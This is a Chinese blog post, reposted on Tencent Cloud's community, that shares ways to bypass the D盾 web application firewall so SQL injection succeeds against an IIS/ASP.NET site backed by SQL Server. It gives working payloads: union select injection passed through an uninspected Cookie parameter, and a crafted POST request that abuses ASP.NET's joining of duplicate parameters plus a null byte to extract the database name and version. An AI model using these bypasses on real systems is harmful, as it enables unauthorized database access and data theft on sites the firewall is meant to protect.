前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >最新绕过D盾注入方法分享(学姿势)

最新绕过D盾注入方法分享(学姿势)

作者头像
Power7089
发布2020-07-27 16:51:02
5.7K0
发布2020-07-27 16:51:02
举报

测试环境

  • 测试版本:D盾 v2.1.4.4(测试版)
  • 环境:iis7.5+SQLserver 2012

方法一:SQL语句拦截

代码语言:javascript
复制
www.d123.com/news.aspx?id=1 union select
  • aspx 代码是用 Request.Params 获取参数,所以可以获取 COOKIE GET POST 这三种方法参数的值。
代码语言:javascript
复制
string id = Request.Params[“id”];
  • 而且获取参数具有优先级
代码语言:javascript
复制
cookie->post->get
  • D盾是没有拦截 Cookie 参数可以绕过
代码语言:javascript
复制
-1 union select 1,db_name(),@@version
  • 测试:绕过获取数据库信息

本文由“壹伴编辑器”提供技术支持

方法二

代码语言:javascript
复制
string id = Request.Params[“id”];
  • aspx 传入的参数如果重复系统会进行拼接,id=1&id=2 会等价于 id=1,2
代码语言:javascript
复制
Asp.net + iis:id=1,2,3
  • 测试:
代码语言:javascript
复制
POST /news.aspx?id=1.8eunion/ 
HTTP/1.1 
Host: www.d123.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Connection: close 
Cookie: _d_id=4400020b0469c82ad109c2a344f34a

Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 40 id=%001/select 1,@@version,db_name()–
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-05-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 程序员阿甘 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档